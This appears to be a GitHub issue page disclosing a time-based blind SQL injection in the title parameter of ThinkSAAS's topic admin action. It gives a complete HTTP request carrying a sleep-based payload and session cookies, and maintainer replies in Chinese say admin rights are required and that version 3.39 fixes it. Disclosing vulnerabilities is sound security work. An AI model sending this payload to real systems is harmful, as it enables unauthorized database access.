Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
GET /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC%%2527+and/**/1-(select/**/1/**/from/**/(select+sleep(3))a)%2523%2520 HTTP/1.1 Host: thinksaas User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-SG,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Referer: http://thinksaas/index.php?app=search&ac=s&kw=keyword Cookie: PHPSESSID=6im4ssqo33h8l2d43u78nbr4c3; ts_autologin=goh59atl3dsk44o4sws48s80co44ww8 Upgrade-Insecure-Requests: 1
Will cause a delay of 6 seconds
The text was updated successfully, but these errors were encountered:
需要后台管理员权限才可完成此SQL注入攻击
Sorry, something went wrong.
3.39已经解决了。
No branches or pull requests
app/topic/action/admin/topic.php 的title参数存在SQL注入漏洞
Will cause a delay of 6 seconds
The text was updated successfully, but these errors were encountered: